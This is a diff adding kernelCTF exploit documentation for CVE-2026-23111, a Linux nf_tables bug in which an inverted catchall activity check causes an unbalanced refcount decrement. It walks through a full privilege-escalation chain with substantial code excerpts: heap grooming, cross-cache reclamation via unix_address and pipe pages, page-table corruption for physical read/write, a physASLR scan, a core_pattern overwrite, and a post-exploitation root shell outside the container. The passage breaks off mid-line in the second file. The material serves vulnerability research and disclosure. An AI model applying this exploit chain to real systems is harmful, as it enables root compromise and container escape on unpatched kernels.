diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/exploit.md new file mode 100644 index 000000000..ae3804758 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/exploit.md @@ -0,0 +1,608 @@ +# Exploit + +## 0. Table of Contents +- [Exploit](#exploit) + - [0. Table of Contents](#0-table-of-contents) + - [1. Background](#1-background) + - [2. Patch analysis](#2-patch-analysis) + - [3. Triggering the vulnerability (unbalanced refcount decrement)](#3-triggering-the-vulnerability-unbalanced-refcount-decrement) + - [4. Initialization for exploit](#4-initialization-for-exploit) + - [4.1 Disable buffering](#41-disable-buffering) + - [4.2 Setup namespaces](#42-setup-namespaces) + - [4.3 Pinning the CPU](#43-pinning-the-cpu) + - [5. Exploit for COS-121-18867.294.100 Instance](#5-exploit-for-cos-121-18867294100-instance) + - [5.1 Overview](#51-overview) + - [5.2 Preparation for object manipulation](#52-preparation-for-object-manipulation) + - [5.3 Heap grooming](#53-heap-grooming) + - [5.4 Triggering the vulnerability](#54-triggering-the-vulnerability) + - [5.5 Cross-cache from `kmalloc-cg-128` to `kmalloc-16`](#55-cross-cache-from-kmalloc-cg-128-to-kmalloc-16) + - [5.6 Detecting UAF'd `unix_address`](#56-detecting-uafd-unix_address) + - [5.7 Pivoting `unix_address` UAF into page UAF](#57-pivoting-unix_address-uaf-into-page-uaf) + - [5.8 Page table corruption for physical AARW](#58-page-table-corruption-for-physical-aarw) + - [5.9 Bypassing physASLR](#59-bypassing-physaslr) + - [5.10 Post exploitation](#510-post-exploitation) + - [6. Summary](#6-summary) + +## 1. Background + +Netfilter nf_tables is a modern packet filtering framework in Linux. It allows defining rules and actions for handling incoming and outgoing network packets. The subsystem consists of several key components: `table`, `chain`, `rule`, `expressions`, and `set`. At the top level, each `table` represents a distinct logical domain for packet filtering. Within a `table`, `chain` objects are defined as ordered sets of `rule`. + +A `set` stores unique elements such as addresses or port numbers. When a set has the `NFT_SET_MAP` flag, it acts as a verdict map, where each element maps a key to a verdict (e.g., `goto` or `jump` to a specific chain). A set element with the `NFT_SET_ELEM_CATCHALL` flag acts as a default match when no other element matches the lookup key. Verdict map elements that reference a chain via `NFT_GOTO` or `NFT_JUMP` increment the target chain's `use` reference count. + +nf_tables supports a transaction mechanism for commands. Multiple commands can be applied as a single batch through Netlink socket. If any command in the batch fails, the entire batch is aborted, and the abort path restores each component to its previous state. + +To interact with Netfilter nf_tables subsystem on the user program, [libmnl library](https://www.netfilter.org/projects/libmnl/) and the [libnftnl library](https://www.netfilter.org/projects/libnftnl/index.html) are commonly used. Our exploit also utilized these libraries. + +## 2. Patch analysis + +- [commit f41c5d151078c5348271ffaf8e7410d96f2d82f8](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f41c5d151078c5348271ffaf8e7410d96f2d82f8) + +```diff +diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c +--- a/net/netfilter/nf_tables_api.c ++++ b/net/netfilter/nf_tables_api.c +@@ -5914,7 +5914,7 @@ static void nft_map_catchall_activate(const struct nft_ctx *ctx, + + list_for_each_entry(catchall, &set->catchall_list, list) { + ext = nft_set_elem_ext(set, catchall->elem); +- if (!nft_set_elem_active(ext, genmask)) ++ if (nft_set_elem_active(ext, genmask)) + continue; + nft_clear(ctx->net, ext); +``` + +This patch fixes an inverted element activity check in `nft_map_catchall_activate()`. The function is called during the abort path to restore catchall elements that were deactivated during the prepare phase. The buggy version has opposite logic compared to its non-catchall counterpart `nft_mapelem_activate()`: it skips inactive elements (which need reactivation) and processes active elements instead. The fix simply removes the negation operator (`!`). + +The consequence is that when a `DELSET` operation is aborted, `nft_setelem_data_activate()` is never called for the catchall element. For `NFT_GOTO` verdict elements, this means `nft_data_hold()` is never called to restore the `chain->use` reference count, leading to an unbalanced refcount decrement and use-after-free. + +## 3. Triggering the vulnerability (unbalanced refcount decrement) + +In this section, we discuss how the inverted genmask check in `nft_map_catchall_activate()` causes an unbalanced refcount decrement and eventually leads to use-after-free. + +When a verdict map element references a chain via `NFT_GOTO`, the `nft_setelem_data_activate()` and `nft_setelem_data_deactivate()` functions manage the chain's `use` reference count. These are called during transaction prepare (deactivation) and abort (reactivation) phases. + +- [net/netfilter/nf_tables_api.c:nft_map_catchall_activate()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/nf_tables_api.c?h=v6.6) +```c +static void nft_map_catchall_activate(const struct nft_ctx *ctx, + struct nft_set *set) +{ + u8 genmask = nft_genmask_next(ctx->net); + struct nft_set_elem_catchall *catchall; + struct nft_set_elem elem; + struct nft_set_ext *ext; + + list_for_each_entry(catchall, &set->catchall_list, list) { + ext = nft_set_elem_ext(set, catchall->elem); + if (!nft_set_elem_active(ext, genmask)) // [1] BUG: inverted check + continue; + nft_clear(ctx->net, ext); + elem.priv = catchall->elem; + nft_setelem_data_activate(ctx->net, set, &elem); // [2] never reached for inactive catchall + break; + } +} +``` + +Compare this with the non-catchall counterpart `nft_mapelem_activate()`: +```c +static int nft_mapelem_activate(const struct nft_ctx *ctx, + struct nft_set *set, + const struct nft_set_iter *iter, + struct nft_set_elem *elem) +{ + nft_setelem_data_activate(ctx->net, set, elem); // always called + return 0; +} +``` + +The condition at [1] is inverted. For inactive catchall elements (those deactivated during `DELSET` prepare), `nft_set_elem_active()` returns `false`, so `!false` is `true`, and the function skips them via `continue`. Thus, `nft_setelem_data_activate()` [2] is never called for the element that needs reactivation. + +The following transaction sequence triggers the unbalanced refcount decrement: + +1. Create a table, a base chain, a verdict map `vmap`, and a non-base `target_chain`. +2. Add a catchall element to `vmap` with `goto target_chain` verdict. This increments `target_chain->use` to 1. +3. Send a batch containing: + - `DELSET(vmap)`: prepare phase succeeds; `nft_setelem_data_deactivate()` decrements `target_chain->use` to 0. + - `NEWRULE` on a non-existent chain: fails, causing the entire batch to abort. +4. During abort, `nft_map_catchall_activate()` is called but due to the inverted check [1], `nft_setelem_data_activate()` [2] is never called. The `target_chain->use` remains 0 instead of being restored to 1. + +- [exploit/cos-121-18867.294.100/exploit.c#L356](../exploit/cos-121-18867.294.100/exploit.c#L356) +```c +static void trigger_abort(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name) +{ + /* Step 1: DELSET - prepare succeeds, catchall deactivated, chain->use-- */ + // ... (DELSET message) + + /* Step 2: NEWRULE on non-existent chain -> fails -> batch aborts */ + // ... (NEWRULE on "__nonexistent_chain__") +} +``` + +With `target_chain->use == 0`, a subsequent `DELCHAIN(target_chain)` succeeds and the chain object is freed, while the verdict map's catchall element still holds a stale pointer to it. + +## 4. Initialization for exploit +Before triggering the vulnerability, the exploit takes the following steps: +1. Disable buffering +2. Setup namespaces +3. Pinning the CPU + +### 4.1 Disable buffering +- [exploit/cos-121-18867.294.100/exploit.c#L619](../exploit/cos-121-18867.294.100/exploit.c#L619) +```c +setvbuf(stdin, 0, 2, 0); +setvbuf(stdout, 0, 2, 0); +setvbuf(stderr, 0, 2, 0); +``` +Disable buffering for `stdin`, `stdout`, and `stderr` with `setvbuf`. + +### 4.2 Setup namespaces +- [exploit/cos-121-18867.294.100/exploit.c#L638](../exploit/cos-121-18867.294.100/exploit.c#L638) +```c +unshare_setup(getuid(), getgid()); +``` +- [exploit/cos-121-18867.294.100/exploit.c#L417](../exploit/cos-121-18867.294.100/exploit.c#L417) +```c +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp; + char edit[0x100]; + + unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); + + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + + return; +} +``` +We create and enter user/network namespace with `unshare` syscall. This is necessary to trigger the vulnerability in the Netfilter nf_tables subsystem as an unprivileged user, since it requires `CAP_NET_ADMIN` capability. + +### 4.3 Pinning the CPU +- [exploit/cos-121-18867.294.100/exploit.c#L639](../exploit/cos-121-18867.294.100/exploit.c#L639) +```c +set_cpu_affinity(0, 0); +``` +- [exploit/cos-121-18867.294.100/exploit.c#L441](../exploit/cos-121-18867.294.100/exploit.c#L441) +```c +void set_cpu_affinity(int cpu_n, pid_t pid) { + cpu_set_t *set = malloc(sizeof(cpu_set_t)); + + CPU_ZERO(set); + CPU_SET(cpu_n, set); + + if (sched_setaffinity(pid, sizeof(set), set) < 0){ + perror("sched_setaffinity"); + return; + } + free(set); +} +``` +Pinning the current task to CPU core 0 with `sched_setaffinity` syscall. This is to maintain the exploit context in the same core to utilize the percpu slab cache and freelist. + +## 5. Exploit for COS-121-18867.294.100 Instance + +In this section, we discuss the exploit in detail for `cos-121-18867.294.100` instances. + +### 5.1 Overview +This exploit takes the following steps: +1. Preparation for object manipulation +2. Heap grooming +3. Triggering the vulnerability +4. Cross-cache #1: `kmalloc-cg-128` to `kmalloc-16` +5. Detecting UAF'd `unix_address` and triggering double free +6. Cross-cache #2: `kmalloc-16` to pipe page (page UAF) +7. Page table corruption for physical AARW +8. Bypassing physASLR +9. Post exploitation + +### 5.2 Preparation for object manipulation + +First, we initialize the message queues and socket arrays for heap spray. + +- [exploit/cos-121-18867.294.100/exploit.c#L663](../exploit/cos-121-18867.294.100/exploit.c#L663) +```c +init_msgq(defrag_msg_arr, DEFRAG_MSG_SPARY_SZ); +init_unix_sock(defrag_sock_arr, DEFRAG_SOCK_SPARY_SZ); + +init_msgq(cc_msg_arr1, CC_MSG_SPARY_SZ); +init_msgq(cc_msg_arr2, CC_MSG_SPARY_SZ); +init_unix_sock(server_sock_arr, RECLAIM_SOCK_SPARY_SZ); +init_unix_sock(client_sock_arr, RECLAIM_SOCK_SPARY_SZ); +init_unix_sock(reclaim_sock_arr, RECLAIM_SOCK_SPARY_SZ); + +for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (pipe2(pipe_arr[i], O_NONBLOCK) < 0) { + perror("init pipe"); + for(;;); + } +} +``` + +Each object array performs the following roles: +- `defrag_msg_arr` / `defrag_sock_arr`: Used for defragmenting `kmalloc-16` slab cache before reclamation. +- `cc_msg_arr1` / `cc_msg_arr2`: `msg_msg` objects (0x80 bytes) sprayed in `kmalloc-cg-128` surrounding the victim `nft_chain` object. Freeing these helps return the slab page to the page allocator for cross-cache. +- `server_sock_arr` / `client_sock_arr`: Unix sockets whose `unix_address` objects (16 bytes, in `kmalloc-16`) reclaim the freed chain's page. +- `pipe_arr`: Pipe pairs used to create pipe buffer pages that will overlap with page tables. + +### 5.3 Heap grooming + +- [exploit/cos-121-18867.294.100/exploit.c#L684](../exploit/cos-121-18867.294.100/exploit.c#L684) + +We create the nf_tables objects in a specific order to sandwich the `target_chain` allocation between `msg_msg` spray objects in `kmalloc-cg-128`. + +```c +/* Phase 1a: table + base chain + verdict map */ +add_table(b, &seq, family, table); +add_chain(b, &seq, family, table, bchain, true); +add_verdict_map(b, &seq, family, table, mapname, mapid); +``` + +- [exploit/cos-121-18867.294.100/exploit.c#L705](../exploit/cos-121-18867.294.100/exploit.c#L705) +```c +/* Phase 1b-d: spray msg_msg, create chain, spray more msg_msg */ +spray_msgsnd(cc_msg_arr1, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_buf, 1, 2); // [1] +ret = send_batch_and_recv(b); // target_chain allocated here +spray_msgsnd(cc_msg_arr2, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_buf, 1, 2); // [2] +``` + +We spray `CC_MSG_SPARY_SZ` (0x400) `msg_msg` objects of size `MSG_MSG_SIZE` (0x80) before [1] and after [2] the `target_chain` creation. `msg_msg` at 0x80 bytes (including 48-byte header) occupies `kmalloc-cg-128`. This places the chain object in between two blocks of `msg_msg` objects on the same slab page, which is critical for the cross-cache step later. + +- [exploit/cos-121-18867.294.100/exploit.c#L725](../exploit/cos-121-18867.294.100/exploit.c#L725) +```c +/* Phase 1e: add catchall element with goto verdict */ +add_catchall_elem_raw(b, &seq, family, table, mapname, mapid, tchain); +``` + +We add a catchall element to the verdict map with a `goto target_chain` verdict. This increments `target_chain->use` to 1. + +### 5.4 Triggering the vulnerability + +- [exploit/cos-121-18867.294.100/exploit.c#L746](../exploit/cos-121-18867.294.100/exploit.c#L746) +```c +/* DELSET(vmap) + NEWRULE(fail) -> abort */ +trigger_abort(b, &seq, family, table, mapname); +ret = send_batch_and_recv(b); +``` + +We send the abort-triggering batch described in [Section 3](#3-triggering-the-vulnerability-unbalanced-refcount-decrement). After the batch aborts, `target_chain->use == 0`. + +### 5.5 Cross-cache from `kmalloc-cg-128` to `kmalloc-16` + +The `nft_chain` object is allocated in `kmalloc-cg-128`. To reclaim the freed chain's memory with a different object type, we perform a cross-cache attack to move the underlying slab page from `kmalloc-cg-128` to `kmalloc-16`. + +- [include/net/af_unix.h:struct unix_address](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/net/af_unix.h?h=v6.6) +```c +struct unix_address { + refcount_t refcnt; // [1] 4 bytes + int len; // [2] 4 bytes + struct sockaddr_un name[]; +}; +``` + +The `unix_address` object is allocated when `bind()` is called on a unix socket (via `unix_create_addr()`). Its size is `sizeof(unix_address)` (8 bytes) + the address length. We use `addr_len = 0x10 - sizeof(struct unix_address) = 8`, making the total allocation 16 bytes, thus placing it in `kmalloc-16`. + +The `unix_address` refcount lifecycle is managed by three operations: + +- [net/unix/af_unix.c:unix_create_addr()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/unix/af_unix.c?h=v6.6) +```c +static struct unix_address *unix_create_addr(struct sockaddr_un *sunaddr, int addr_len) +{ + struct unix_address *addr; + addr = kmalloc(sizeof(*addr) + addr_len, GFP_KERNEL); + // ... + refcount_set(&addr->refcnt, 1); // [1] initialized to 1 on bind() + return addr; +} +``` + +- [net/unix/af_unix.c:unix_stream_connect()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/unix/af_unix.c?h=v6.6) +```c + refcount_inc(&otheru->addr->refcnt); // [2] +1 when client connects + smp_store_release(&newu->addr, otheru->addr); +``` + +- [net/unix/af_unix.c:unix_release_addr()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/unix/af_unix.c?h=v6.6) +```c +static inline void unix_release_addr(struct unix_address *addr) +{ + if (refcount_dec_and_test(&addr->refcnt)) // [3] -1; kfree when 0 + kfree(addr); +} +``` + +On `bind()`, `refcnt` is initialized to 1 [1]. When a client calls `connect()`, `unix_stream_connect()` increments `refcnt` to 2 [2] as the child socket shares the listener's address. On socket destruction, `unix_sock_destructor()` calls `unix_release_addr()` [3] to drop one reference; the last decrement triggers `kfree()`. + +- [exploit/cos-121-18867.294.100/exploit.c#L760](../exploit/cos-121-18867.294.100/exploit.c#L760) +```c +struct sockaddr_un un_addr; +size_t addr_len = 0x10 - sizeof(struct unix_address); +memset(&un_addr, 0, sizeof(struct sockaddr_un)); +un_addr.sun_family = AF_UNIX; +un_addr.sun_path[0] = '\0'; // abstract namespace +``` + +Now we perform the `DELCHAIN` and cross-cache reclamation sequence: + +- [exploit/cos-121-18867.294.100/exploit.c#L768](../exploit/cos-121-18867.294.100/exploit.c#L768) +```c +/* Step 1: Prepare DELCHAIN batch */ +del_chain(b, &seq, family, table, tchain); + +/* Step 2: Defragment kmalloc-16 with unix_address objects */ +for (int i = 0; i < DEFRAG_SOCK_SPARY_SZ; i++) { + *(size_t *)(&un_addr.sun_path[1]) = i + 1; + bind(defrag_sock_arr[i], (struct sockaddr *)&un_addr, addr_len); // [1] +} + +/* Step 3: Free surrounding msg_msg to release slab page */ +release_msg(cc_msg_arr1, CC_MSG_SPARY_SZ); // [2] +release_msg(cc_msg_arr2, CC_MSG_SPARY_SZ); // [3] + +/* Step 4: Send DELCHAIN - chain object is freed */ +ret = send_batch_and_recv(b); // [4] + +/* Step 5: Reclaim with unix_address objects */ +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) { + *(size_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; // [5] + bind(server_sock_arr[i], (struct sockaddr *)&un_addr, addr_len); +} +``` + +The steps are: +1. Defragment `kmalloc-16` slab [1] by allocating `DEFRAG_SOCK_SPARY_SZ` (0x200) `unix_address` objects. This ensures subsequent `kmalloc-16` allocations come from fresh pages. +2. Free all `msg_msg` objects surrounding the chain [2][3]. With the chain freed at [4] and the surrounding objects also freed, the slab page is returned to the page allocator. +3. Allocate `RECLAIM_SOCK_SPARY_SZ` (0x400) `unix_address` objects [5] with names containing `UNIX_MAGIC_ADDR` (0xdeadbeef) marker plus an index. These `kmalloc-16` allocations reclaim pages from the page allocator, including the page that previously held the chain object. + +We then connect client sockets to server sockets to increase the `unix_address` refcount: +- [exploit/cos-121-18867.294.100/exploit.c#L806](../exploit/cos-121-18867.294.100/exploit.c#L806) +```c +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) { + listen(server_sock_arr[i], 2); + *(uintptr_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; + connect(client_sock_arr[i], (struct sockaddr*)&un_addr, addr_len); // [1] + tmp_sock = accept(server_sock_arr[i], NULL, NULL); + close(tmp_sock); +} + +/* Cleanup: delete the table, which destroys the verdict map */ +del_table(b, &seq, family, table); +send_batch_and_recv(b); +``` + +Connecting the client socket to the server socket [1] increments the server's `unix_address->refcnt` from 1 to 2. This is critical for what follows. + +When the table is deleted, the verdict map and its catchall element are destroyed. The catchall element's `goto` verdict still references the stale chain pointer, which now overlaps with a `unix_address` object. During destruction, `nft_data_release()` performs a UAF access on the stale chain pointer to decrement what it thinks is `chain->use`. However, this field overlaps with `unix_address->refcnt`, causing the refcount to drop from 2 to 1. This creates a refcount imbalance: the `unix_address` has two references (server socket + client socket) but a refcount of only 1. + +### 5.6 Detecting UAF'd `unix_address` and triggering double free + +To identify which server socket has the refcount-corrupted `unix_address` and trigger the double free, we close each client socket and probe with `getsockname()`. + +- [exploit/cos-121-18867.294.100/exploit.c#L846](../exploit/cos-121-18867.294.100/exploit.c#L846) +```c +int uaf_idx = -1; +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) { + close(client_sock_arr[i]); // [1] + getsockname(server_sock_arr[i], (struct sockaddr *)&uaf_addr, &uaf_addr_len); + ret = *(uintptr_t *)(&uaf_addr.sun_path[1]); + if (ret - UNIX_MAGIC_ADDR != i + 1) { // [2] + uaf_idx = i; + } +} +``` + +Closing the client socket [1] drops one reference to the `unix_address`. For the corrupted `unix_address` (whose refcount was lowered from 2 to 1 by the UAF), this drops the refcount to 0, causing the `unix_address` to be freed, even though the server socket still holds a reference. We detect this by checking `getsockname()` [2]: if the returned name no longer matches the expected `UNIX_MAGIC_ADDR + index`, the `unix_address` was prematurely freed, and we record that socket index as `uaf_idx`. + +### 5.7 Pivoting `unix_address` UAF into page UAF + +We now pivot the `unix_address` UAF into a page-level UAF by leveraging the freed page. + +- [exploit/cos-121-18867.294.100/exploit.c#L866](../exploit/cos-121-18867.294.100/exploit.c#L866) +```c +/* Step 1: Close all server sockets except the UAF one */ +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) + if (i != uaf_idx) close(server_sock_arr[i]); + +/* Step 2: Spray pipe pages with known pattern */ +int *curr = (int *)pipe_buf; +for (int i = 0; i < sizeof(pipe_buf) / sizeof(int); i++) + curr[i] = 1; + +for (int i = 0; i < PIPE_SPARY_SZ; i++) { + write(pipe_arr[i][1], pipe_buf, PG_SIZE); // [1] +} + +/* Step 3: mmap large region for page table spray */ +addr = mmap((void *)MMAP_ADDR, MMAP_SZ, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, -1, 0); +madvise((void *)MMAP_ADDR, MMAP_SZ, MADV_NOHUGEPAGE); // [2] +``` + +We write a full page of `0x00000001` pattern (as `int`) to each pipe [1]. The value `1` is chosen deliberately: if a pipe buffer page overlaps with a `unix_address` object, it overwrites `refcnt` to 1. This means closing the server socket will drop the refcount to 0 and trigger `kfree()`, resulting in a invalid double free. The pipe writes also drain the PCP (per-cpu page) buddy list for order-0 pages, ensuring that subsequent pipe buffer and page table allocations compete for the same pages. We also `mmap` a large contiguous region (`PT_SPRAY_SZ * MMAP_GAP` = 0x100 * 0x200000 = 512 MB) and set `MADV_NOHUGEPAGE` [2] to ensure 4K page table entries instead of huge pages. + +- [exploit/cos-121-18867.294.100/exploit.c#L886](../exploit/cos-121-18867.294.100/exploit.c#L886) +```c +/* Step 4: Close the UAF server socket - triggers page free */ +close(server_sock_arr[uaf_idx]); // [1] + +/* Step 5: Touch pages in mmap region - allocates page tables */ +for (int i = 0; i < PT_SPRAY_SZ; i++) { + *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i) = i + 1; // [2] +} +``` + +Closing the UAF server socket [1] triggers `unix_sock_destructor()`, which calls `unix_release_addr()` on the `unix_address` whose `refcnt` was overwritten to 1 by the pipe spray. This decrements the refcount to 0 and calls `kfree()` on the `unix_address`. However, this `kfree()` is an invalid free: the `unix_address`'s slab page has already been drained and returned to the page allocator, and the page is now occupied by pipe buffer pages. The SLUB allocator processes this invalid `kfree()` and frees one of the pipe buffer pages back to the page allocator (see [Novel Techniques: Exploiting unexpected behavior of invalid address kfree](novel-techniques.md#exploiting-unexpected-behavior-of-invalid-address-kfree) for details). Each first memory access at a 2MB-aligned virtual address [2] then allocates a new page table (PTE page) from the page allocator. One of these PTE pages lands on the freed pipe buffer page, creating a pipe buffer / page table overlap. + +### 5.8 Page table corruption for physical AARW + +We now have a pipe buffer and a page table sharing the same physical page. Reading the pipe gives raw PTE entries; writing to the pipe overwrites them. + +- [exploit/cos-121-18867.294.100/exploit.c#L893](../exploit/cos-121-18867.294.100/exploit.c#L893) +```c +for (int i = 0; i < PIPE_SPARY_SZ; i++) { + read(pipe_arr[i][0], tmp_buf, PG_SIZE); + if (*((int *)tmp_buf) != 0x1) { // [1] + pte = *((uintptr_t *)tmp_buf); // [2] + pt_idx = i; + *((uintptr_t *)tmp_buf) = pte - 0x4000; // [3] + write(pipe_arr[i][1], tmp_buf, PG_SIZE); // [4] + flush_tlb(MMAP_ADDR, MMAP_SZ); + break; + } +} +``` + +We iterate through all pipes and read their contents. If the read data is not our `0x00000001` pattern [1], it contains PTE values [2], meaning this pipe's buffer page overlaps a page table. We then modify the first PTE to point `0x4000` (4 pages) earlier in physical memory [3] and write it back [4], creating a mapping to a different physical page. + +- [exploit/cos-121-18867.294.100/exploit.c#L917](../exploit/cos-121-18867.294.100/exploit.c#L917) +```c +for (int i = 0; i < PT_SPRAY_SZ; i++) { + ret = *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i); + if (ret != i + 1) { // [1] + pt_addr = (uintptr_t)addr + MMAP_GAP * i; // [2] + break; + } +} +``` + +We find the corrupted virtual address by scanning the mmap region [1]. The virtual address at `pt_addr` [2] now maps to a different physical page than originally intended. We use this address as the window for physical memory access. + +With the pipe as our PTE read/write channel, we build `aar()` and `aaw()` helper functions for arbitrary physical read/write: + +- [exploit/cos-121-18867.294.100/exploit.c#L500](../exploit/cos-121-18867.294.100/exploit.c#L500) +```c +void aar(int fd[], void *virt_dst, void *phys_src, void *corrupted_addr, size_t len) +{ + // 1. Read current PTE page via pipe + read(fd[0], tmp, PG_SIZE); + flags = tmp[0] & 0xfff; + + // 2. Construct PTE pointing to target physical address + for (i = 0; i < num_pages; ++i) { + tmp[i] = flags | p | 0x8000000000000000; // present + target phys addr + p += PG_SIZE; + } + + // 3. Write modified PTE page via pipe + write(fd[1], tmp, PG_SIZE); + + // 4. Flush TLB and read through the remapped virtual address + flush_tlb(corrupted_addr, len); + memcpy(virt_dst, corrupted_addr + offset, len); +} +``` + +The `flush_tlb` function uses `mprotect` and `clflush` to ensure the TLB is flushed: +- [exploit/cos-121-18867.294.100/exploit.c#L473](../exploit/cos-121-18867.294.100/exploit.c#L473) +```c +void flush_tlb(void *ptr, size_t count) { + mprotect(ptr, count, PROT_READ | PROT_WRITE | PROT_EXEC); + mprotect(ptr, count, PROT_READ | PROT_WRITE); + sched_yield(); + asm volatile("clflush 0(%0)\n" : : "c"(ptr) : "rax"); +} +``` + +### 5.9 Bypassing physASLR + +With physical AARW established, we need to locate the kernel in physical memory. Physical ASLR (physASLR) randomizes the kernel's physical load address. We bypass this with a simple linear scan. Refer to [Effective bypass of physASLR section of novel-techniques.md](./novel-techniques.md#effective-bypass-of-physaslr) for details on why this works. + +- [exploit/cos-121-18867.294.100/exploit.c#L927](../exploit/cos-121-18867.294.100/exploit.c#L927) +```c +#define CORE_PATTERN_PHYS_ADDR 0x3fb3440 +int cnt = 0; +while (1) { + aar(pipe_arr[pt_idx], tmp_buf, + CORE_PATTERN_PHYS_ADDR + cnt * 0x1000000, // [1] + pt_addr, PG_SIZE); + char *core_pattern_addr = (char *)(pt_addr + (CORE_PATTERN_PHYS_ADDR & 0xfff)); + if (!strcmp(core_pattern_addr, "core")) { // [2] + strcpy(core_pattern_addr, "|/proc/%P/fd/666 %P %P"); // [3] + // write back modified PTE, flush TLB + break; + } + cnt++; +} +``` + +`CORE_PATTERN_PHYS_ADDR` (0x3fb3440) is the offset of `core_pattern` from the kernel physical base on the target COS image. We scan candidate base addresses at 16 MB (0x1000000) intervals [1] by reading one page at each candidate physical address. When the page contains the expected `"core"` string [2], we have found the kernel image and overwrite it with our `core_pattern` payload [3]. + +### 5.10 Post exploitation + +After overwriting `core_pattern`, we use it to execute code as root. + +- [exploit/cos-121-18867.294.100/exploit.c#L577](../exploit/cos-121-18867.294.100/exploit.c#L577) +```c +void crash(char *cmd) +{ + int memfd = memfd_create("", MFD_EXEC); + sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff); // [1] + dup2(memfd, 666); // [2] + close(memfd); + sleep(1); + while (check_core() == 0) { + sleep(1); + } + *(size_t *)0 = 0; // [3] trigger crash +} +``` + +- [exploit/cos-121-18867.294.100/exploit.c#L962](../exploit/cos-121-18867.294.100/exploit.c#L962) +```c +if (fork() == 0) { + set_cpu_affinity(1, 0); + setsid(); + crash(""); + for(;;); +} +``` + +The exploit forks a child process which: +1. Creates a `memfd` and copies the exploit binary itself into it [1]. +2. Duplicates the memfd to file descriptor 666 [2]. +3. Waits for `core_pattern` to be overwritten, then triggers a null pointer dereference [3]. + +When the crash occurs, the kernel reads `core_pattern` which is now `|/proc/%P/fd/666 %P %P`. This causes the kernel to execute our binary (at `/proc//fd/666`) as root. + +- [exploit/cos-121-18867.294.100/exploit.c#L623](../exploit/cos-121-18867.294.100/exploit.c#L623) +```c +if (argc > 2) { + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + + system("cat /flag"); + execlp("bash", "bash", NULL); +} +``` + +When the binary is executed as root via `core_pattern`, it receives the crashing process's PID as an argument. It uses `pidfd_open` and `pidfd_getfd` to steal the parent's stdin/stdout/stderr file descriptors, reads the flag, and drops a root shell outside the container. + +## 6. Summary + +This exploit chains together the following primitives: +1. **Unbalanced refcount decrement** via inverted genmask check in `nft_map_catchall_activate()` -> chain use-after-free +2. **Cross-cache #1** (`kmalloc-cg-128` -> `kmalloc-16`) to reclaim chain memory with `unix_address` objects -> refcount corruption via UAF field overlap +3. **Cross-cache #2** (`kmalloc-16` -> pipe page) via invalid `kfree` on drained slab -> page-level free (refer [novel-techniques.md](./novel-techniques.md#exploiting-unexpected-behavior-of-invalid-address-kfree)) +4. **Page table / pipe buffer overlap** via page UAF -> physical arbitrary read/write +5. **PhysASLR bypass** via linear physical memory scan (refer [novel-techniques.md](./novel-techniques.md#effective-bypass-of-physaslr)) +6. **`core_pattern` overwrite** -> root code execution outside the container + +Exploit stability: ~60-70% success rate (excluding post-exploitation), ~20-30% (including post-exploitation). diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/novel-techniques.md new file mode 100644 index 000000000..f60fd1bea --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/novel-techniques.md @@ -0,0 +1,121 @@ +# Novel Techniques + +While exploiting CVE-2026-23111, we identified two novel exploit techniques: an effective bypass of physical ASLR through linear physical memory scanning, and a method to pivot a SLUB object UAF into a page-level UAF via invalid `kfree`. These techniques enabled a full exploit chain from a Netfilter chain unbalanced refcount decrement to root code execution without requiring any kernel address leak. + +## Effective bypass of physASLR + +Physical ASLR (physASLR/KASLR) randomizes the physical base address at which the kernel image is loaded. This is intended to prevent attackers from predicting where kernel data structures reside in physical memory. However, when an attacker already has a physical arbitrary read/write primitive, physASLR can be bypassed with a simple linear scan without requiring any information leak. + +In our exploit, we know the offset of `core_pattern` from the kernel physical base on the target COS image (`0x3fb3440`). The kernel physical base is aligned to a large boundary. We scan candidate base addresses at 16 MB (0x1000000) intervals: + +- [exploit/cos-121-18867.294.100/exploit.c#L927](../exploit/cos-121-18867.294.100/exploit.c#L927) +```c +#define CORE_PATTERN_PHYS_ADDR 0x3fb3440 +int cnt = 0; +while 